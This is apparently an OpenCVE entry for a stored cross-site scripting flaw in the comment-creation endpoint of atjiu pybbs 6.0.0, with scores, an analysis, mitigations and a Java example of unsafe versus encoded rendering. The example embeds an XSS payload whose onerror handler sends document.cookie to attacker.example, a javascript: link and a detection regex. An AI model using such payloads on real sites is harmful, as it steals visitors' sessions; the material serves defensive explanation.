Description
A security flaw has been discovered in atjiu pybbs 6.0.0. This impacts the function create of the file src/main/java/co/yiiu/pybbs/controller/api/CommentApiController.java. The manipulation results in cross site scripting. It is possible to launch the attack remotely. The exploit has been released to the public and may be used for attacks.
Published: 2026-03-20
Score: 5.1 Medium
EPSS: < 1% Very Low
KEV: No
Impact: Cross‑Site Scripting
Action: Assess Impact
AI Analysis

Impact

A flaw in atjiu pybbs 6.0.0 affects the create method of CommentApiController, the API endpoint through which new comments are submitted. Comment content accepted by this endpoint is stored and later rendered into the page without adequate neutralisation, so a malicious user can persist a script payload that executes in the browser of every visitor who views the affected thread, running arbitrary JavaScript in that visitor's session context. The recorded CVSS vectors (PR:L, UI:R) indicate that the attacker needs a low-privileged account and that a victim must view the page. The weakness is classified as CWE‑79 (improper neutralisation of input during web page generation); the record additionally lists CWE‑94 (code injection).

Affected Systems

The affected product is atjiu pybbs version 6.0.0. The record names no other versions and carries no vendor statement that a later release fixes the issue. pybbs is a Java‑based web forum application whose API layer exposes the comment‑creation endpoint named in the description.

Risk and Exploitability

The 5.1 (medium) score shown for this entry is the CVSS v4.0 rating; the record also carries CVSS v3.0/v3.1 scores of 3.5 (low) and a v2 score of 4.0. All of the vectors describe a network‑reachable issue requiring low privileges (PR:L / Au:S) and, in v3 and v4, victim interaction, with impact limited to integrity. The EPSS probability is below 1 %, indicating a low exploitation likelihood at present. The description states that an exploit has been released and the vectors carry E:P (proof of concept), while the SSVC entry in the history below records Exploitation: none; the public material should therefore be treated as a proof of concept rather than evidence of in‑the‑wild use. The issue is not listed in the CISA KEV catalog. Based on the description, the attack path is a remote user with a low‑privileged account submitting a crafted comment through the API endpoint; the content is stored and rendered without adequate sanitisation or output encoding, so the script executes for subsequent viewers of the page.

Generated by OpenCVE AI on April 15, 2026 at 09:05 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Determine whether the installed atjiu pybbs version is 6.0.0 and check for a newer release or vendor‑provided update that removes the flaw. While none is recorded here, assess exposure by reviewing already‑stored comments for script content, since a stored payload persists until it is removed.
  • Apply context‑aware HTML output encoding wherever comment content is rendered, and validate comment payloads on input. Escaping only at storage time leaves other ingestion paths unprotected, and rendering code must not assume that stored data was already cleaned.
  • The recorded CVSS vectors (PR:L / Au:S) indicate that the attacker already holds a low‑privileged account, so restricting the CommentApi endpoint to authenticated users does not by itself remove the risk. Consider disabling or moderating comment creation, or temporarily blocking external traffic to the endpoint, until a fix is in place.

Generated by OpenCVE AI on April 15, 2026 at 09:05 UTC.
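The create‑then‑render path described in the analysis above, together with the output‑encoding and impact‑assessment steps recommended here, as an added illustration in Java. This is example code written for this page, not pybbs code; the class name, method names, the sample malicious comment and the sample comment table are hypothetical and constructed for the example.

```java
import java.util.LinkedHashMap;
import java.util.Map;
import java.util.regex.Pattern;

/**
 * Added example (not pybbs code). Models how a comment submitted to a
 * create endpoint flows into a rendered page, contrasts the vulnerable
 * concatenation with output encoding, and scans stored comments for
 * active-content markers during impact assessment.
 */
public class CommentXssExample {

    // Constructed sample: what a malicious client might POST to a
    // comment-create API. Any stored-XSS payload works the same way.
    static final String MALICIOUS_COMMENT =
        "Nice post! <img src=x onerror=\"fetch('https://attacker.example/?c='+document.cookie)\">";

    // Vulnerable pattern: stored text is concatenated into HTML untouched,
    // so the browser parses the <img> tag and runs the onerror handler.
    static String renderUnsafe(String content) {
        return "<div class=\"comment\">" + content + "</div>";
    }

    // Encode for the HTML-body context. Doing this at render time keeps the
    // fix independent of how the data entered the store (API, import, migration).
    static String escapeHtml(String s) {
        StringBuilder sb = new StringBuilder(s.length() + 16);
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '&':  sb.append("&amp;");  break;
                case '<':  sb.append("&lt;");   break;
                case '>':  sb.append("&gt;");   break;
                case '"':  sb.append("&quot;"); break;
                case '\'': sb.append("&#x27;"); break;
                case '/':  sb.append("&#x2F;"); break;
                default:   sb.append(c);
            }
        }
        return sb.toString();
    }

    // Hardened pattern: the same template, but the content is encoded first.
    static String renderSafe(String content) {
        return "<div class=\"comment\">" + escapeHtml(content) + "</div>";
    }

    // Triage heuristic for already-stored comments: tags that can carry
    // active content, inline event handlers, and javascript: URLs.
    // Case-insensitive. Matches are candidates for manual review, not proof.
    static final Pattern ACTIVE_CONTENT = Pattern.compile(
        "<\\s*(script|iframe|object|embed|svg|img|math|link|meta)\\b"
        + "|\\bon[a-z]+\\s*="
        + "|javascript\\s*:",
        Pattern.CASE_INSENSITIVE);

    static boolean looksLikeXss(String stored) {
        return ACTIVE_CONTENT.matcher(stored).find();
    }

    public static void main(String[] args) {
        System.out.println("unsafe: " + renderUnsafe(MALICIOUS_COMMENT));
        System.out.println("safe:   " + renderSafe(MALICIOUS_COMMENT));

        // Constructed sample of a comment table: id -> stored content.
        Map<Long, String> commentTable = new LinkedHashMap<>();
        commentTable.put(101L, "Thanks, this fixed my build.");
        commentTable.put(102L, MALICIOUS_COMMENT);
        commentTable.put(103L, "See <a href=\"javascript:alert(document.domain)\">here</a>");
        commentTable.put(104L, "Use a < b && b > c for the bounds check");

        // Ids 102 and 103 are flagged; 104 shows that bare angle brackets
        // in ordinary text do not trip the heuristic.
        for (Map.Entry<Long, String> row : commentTable.entrySet()) {
            if (looksLikeXss(row.getValue())) {
                System.out.println("review comment id " + row.getKey() + ": " + row.getValue());
            }
        }
    }
}
```

Compile and run with `javac CommentXssExample.java && java CommentXssExample`. Two caveats apply when adapting this to a real forum: if comments are intentionally allowed to contain markup, escaping every character is not the fix, and an allowlist HTML sanitizer is needed instead; and the triage regex is a heuristic that will produce both false positives (any "on...=" text) and misses (encoded or split payloads), so treat its output as a review queue rather than a verdict.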

Advisories

No advisories yet.

History

Mon, 23 Mar 2026 10:00:00 +0000

Type                  Values Removed    Values Added
First Time appeared                     Atjiu
                                        Atjiu pybbs
Vendors & Products                      Atjiu
                                        Atjiu pybbs

Fri, 20 Mar 2026 22:15:00 +0000

Type       Values Removed    Values Added
Metrics                      ssvc
                             {'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}


Fri, 20 Mar 2026 18:15:00 +0000

Type          Values Removed    Values Added
Description                     A security flaw has been discovered in atjiu pybbs 6.0.0. This impacts the function create of the file src/main/java/co/yiiu/pybbs/controller/api/CommentApiController.java. The manipulation results in cross site scripting. It is possible to launch the attack remotely. The exploit has been released to the public and may be used for attacks.
Title                           atjiu pybbs CommentApiController.java create cross site scripting
Weaknesses                      CWE-79
                                CWE-94
References
Metrics                         cvssV2_0
                                {'score': 4, 'vector': 'AV:N/AC:L/Au:S/C:N/I:P/A:N/E:POC/RL:ND/RC:UR'}
                                cvssV3_0
                                {'score': 3.5, 'vector': 'CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N/E:P/RL:X/RC:R'}
                                cvssV3_1
                                {'score': 3.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N/E:P/RL:X/RC:R'}
                                cvssV4_0
                                {'score': 5.1, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P'}


MITRE

Status: PUBLISHED

Assigner: VulDB

Published:

Updated: 2026-03-20T21:26:31.515Z

Reserved: 2026-03-20T08:38:45.780Z

Link: CVE-2026-4495

Vulnrichment

Updated: 2026-03-20T21:26:26.203Z

NVD

Status : Deferred

Published: 2026-03-20T18:16:18.000

Modified: 2026-04-29T01:00:01.613

Link: CVE-2026-4495

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-04-15T16:45:09Z

Weaknesses